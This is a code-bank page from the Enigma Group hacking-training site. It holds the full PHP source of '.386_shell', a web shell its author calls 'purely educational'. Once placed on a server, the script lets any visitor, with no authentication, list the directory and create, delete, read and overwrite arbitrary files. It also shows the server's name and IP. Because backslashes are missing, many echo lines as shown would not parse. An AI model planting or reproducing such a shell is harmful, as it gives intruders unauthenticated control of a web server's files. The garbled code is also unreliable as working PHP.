EG Information

Main Index

EG Manual

Disclaimer

Legal Information

Hall of Fame

Hall of Shame

Member Rankings

Members List

Meet the Staff

Training Missions

Read Me First

Basic Skills

Realistic Scenarios

Cryptography

Software Cracking

Linux ELF Binary Cracking

Logical Thinking

Programming

Patching

Steganography

Deface This Wall

/dev/null

/dev/urandom

Knowledge Bank

Discussion Forums

Enigma Chat

RSS Feeds

Articles / Tutorials

Videos

Online EG MP3 Player

Enigma Zine

Downloads

Tools

Code Resources

Submit Code

Ajax

ASM

Bash

CPP

Csharp

Delphi

Haskell

Java

Javascript

Jython

Lisp

mIRC

MySQL

Perl

PHP

Python

QBASIC

VisualBasic

Hakipedia: An open collaborative for all your information security needs.

Has Enigma Group Helped You? Then Help Us By Advertising For Us. Place One Of The Following Images On Your Site.

Enigma Group's Code Bank

.368_shell

By: mediocre - Date Submitted: 2008-06-05 06:29:44

<html>
<?php
/********************************************************************************************************************************
.about_386_shell
 
.386_shell was written by mediocre. 
Purely educational, of course.
 
It's actually not all that.
 
I suppose you could use it as:
 - an alternative content management system
 - a source of (very) basic whois information (e.g. ip address and server name)
 - whatever you want, providing you're willing to implement the new features :P
 
It's a reasonably simple script, because when I made this i'd been learning PHP for about 2 days with no prior knowledge of any programming language. 
All code was written from scratch (and with great difficulty).
 
Please scrutinize my code and bad programming habits and PM me or whatever.
Plus, let me know of any additions or changes that could be made to improve it.(Especially the slight lag problem when editing files on the server.)
 
~mediocre
***********************************************************************************************************************************/
 
echo '
<body bgcolor="#000000" text="#99FF00" link="#99FF00" vlink="#99FF00" alink="#99FF00">
 
 
<br />
<font face="Arial" size="48px">.386_shell</font>
 
<p align="center">
<tt>
';
?>
<table width ="95%" align="center">
  <tr align="center">
    <td>
      <tt>.<b>filename</b></tt>
    </td>
 
<?php
$action = $_GET['action'];
$url = $_SERVER["SERVER_NAME"];
$ip = $_SERVER["SERVER_ADDR"];
$del = ".delete";
$view = ".create_new_file";
$mkdir = ".create_new_dir";
$edit = ".edit";
$upload = ".upload";
 
?> 
 
</tr>
</table>
<?php
$handle = '/testarea';
if ($handle = opendir('.')){
	while (false !== ($file = readdir($handle))){
		if ($file !== '.' && $file !== '..')
		echo "
		<tt>
		$file<br /> 
		</tt>";
		}
 
	closedir($handle);
	echo "</tr>
	</table>";
}
?>
</p>
<br /><br /><br />
<?php
//Create Box
echo "
<p align="center">
$view<form action="" method="post"><input type="text" name="viewthisfile" size="30"><br />
<input type="submit" value="Create">
";
 
echo "<br /><br />";
echo "</p>
";
 
$viewfile = $_POST['viewthisfile']; //$viewfile value is that of the textbox "viewthisfile".
 
if (is_file($viewfile)) {
echo "
<p align="center">" . """ . $viewfile . """ . " is already a file.<br />Enter a different name to continue.
</p>
";
 
}
elseif ($viewfile != ""){ //Else If $viewfile does not equal "", do this:
$emptymess = "
This message has been displayed in order for you to open this file.nnPlease delete it and continue as normal.
";
 
$viewfilehandle = fopen($viewfile, "w") or die("Could not find $viewfile.<br /> Created $viewfile");
//Create filehandle named $viewfilehandle.
//Open $viewfile for writing, if error, display error message.
fwrite ($viewfilehandle, $emptymess);
fclose($viewfilehandle); //Close file.
 
echo "
<p align="center">" 
. $viewfile . " created.
</p>
";
}
 
$viewfile = "";
/* never worked these bits, fix them if you want:
//MKDIR Section
 
 
//Upload box HTML
?>
<p align="center">
<?php echo $upload; ?><br /><br />
  <form enctype="multipart/form-data" action="" method="post">
  <input type="hidden" name="MAX_FILE_SIZE" value="2147483647">
  <input type="file" name="uploadbox" size="30"><br />
<!-- 
  <input type="text" name="target" size="30" value="/"><br />
-->
  <input type="submit" value="Upload">
  </form>
 
<?php
//Upload box PHP
$dir = "upload/";    //$_POST['target'];
$ufile = basename($_FILES['uploadbox']['name']);
$uploadtarget = $dir . $ufile;
 
 
if ($ub != ""){ //If something got put in the textbox named "uploadbox", do this:
  if (move_uploaded_file($_FILES['uploadbox']['tmp_name'], $uploadtarget)){
  echo $ufile . " was succesfully uploaded to " . $dir . "." . "</p>";
  }
  else { //Else do this:
  echo "Error uploading " . $ufile . " to " . $dir . ".</p>"; //Show error message
  }
}
 
$ub = $_POST['uploadbox']; //variable $ub is equal to uploadbox's value 
*/
?>
 
<?php
//Delete Box
echo "
<p align="center">
$del<br><br><form action="" method="post"><input type="text" name="deletethisfile" size="30"><br />
<input type="submit" name="delsubmit" value="Delete">
";
 
$delfile = $_POST['deletethisfile'];
 
 
if ($delfile != "")
{
  if (is_file($delfile)){
    echo "<br /><br />";
    $size = intval(filesize($delfile)/1000) . "kb";unlink($delfile) or die("Error. Could not delete $delfile.");
    echo $delfile . " deleted (" . $size . ").
    "; 
    }
    else {
    echo "<br /><br />" . """ . $delfile . """ . " does not exist.<br />Could not delete " . """ . $delfile . "".";
  }
}
 
//Edit box
$startmess = "";
$emptymess = "
This message has been displayed in order for you to open this file.nnPlease delete it and continue as normal.
";
 
$save = "stn.txt";
$anything = "386shell";
 
if (is_file($save)){
$savethename = $save;
$stnhandle = fopen($savethename, 'r');
$startmess = fread($stnhandle, 1024);
 
$anyhandle = fopen($savethename, 'w');
fwrite($anyhandle, $anything);
 
fclose($stnhandle);
}
 
if ($_POST['editthisfile'] != "") {
$etf = $_POST['editthisfile'];
	if (is_file($etf)){
	$etfhandle = fopen($etf, 'r');
		if (filesize($etf) == 0){
		$quickwrite = fopen($etf, "w");
		fwrite($quickwrite, $emptymess);
		fclose($quickwrite);
 
		$ed = fread($etfhandle, filesize($etf)) ;
		fclose($etfhandle);
		} else {
		$ed = fread($etfhandle, filesize($etf)) ;
		fclose($etfhandle);		
		}
	} else {
	$errormess = "Error. Could not open "$etf". "$etf" does not exist.";
	$errormess = stripslashes($errormess);
	}
 
}
 
	$startmess = $_POST['editthisfile'];
	$startmess = strip_tags(trim($startmess));
 
	$savethename = $save;
	$stnhandle = fopen($savethename, 'w');
	fwrite($stnhandle, $startmess);
	fclose($stnhandle);
 
if (isset($_POST['bang'])){
	$modmess = ""$startmess" modified.";
}
 
if (isset($ed)){
echo "<form method="post" action="" name="editform"><br /><br />$edit<br /><br />
<input type="text" name="editthisfile" size="30" value="$startmess"><input type="Submit" value="View Source"><br />
<textarea name="editcode" rows="10" cols="50">$ed</textarea><br />
<input type="submit" name="bang" value="Edit">
</form>
$modmess
<br />
";
	$etf = $_POST['editthisfile'];	
 
	if (isset($_POST['bang'])) {
	$striped = stripslashes($_POST['editcode']);
	$stripy = fopen($etf, 'w');
	fwrite($stripy, $striped);
	fclose($stripy);
 
	}
 
} else {
echo "<form method="post" action="" name="editform"><br /><br />$edit<br /><br />
<input type="text" name="editthisfile" size="30" value="$startmess"><input type="Submit" value="View Source"><br />
<textarea name="editcode" rows="10" cols="50"></textarea><br />
<input type="submit" name="bang" value="Edit">
</form>
$errormess
";
}
 
 
?>
 
<?php
echo "
<p align="center">
  <b>.server_name</b><br />
  : : $url : :<br />
  <br />
  <b>.server_addr</b><br />
  : : $ip : :
</p>
";
?>
</body>
</html>

Comments [0]

Return to php category list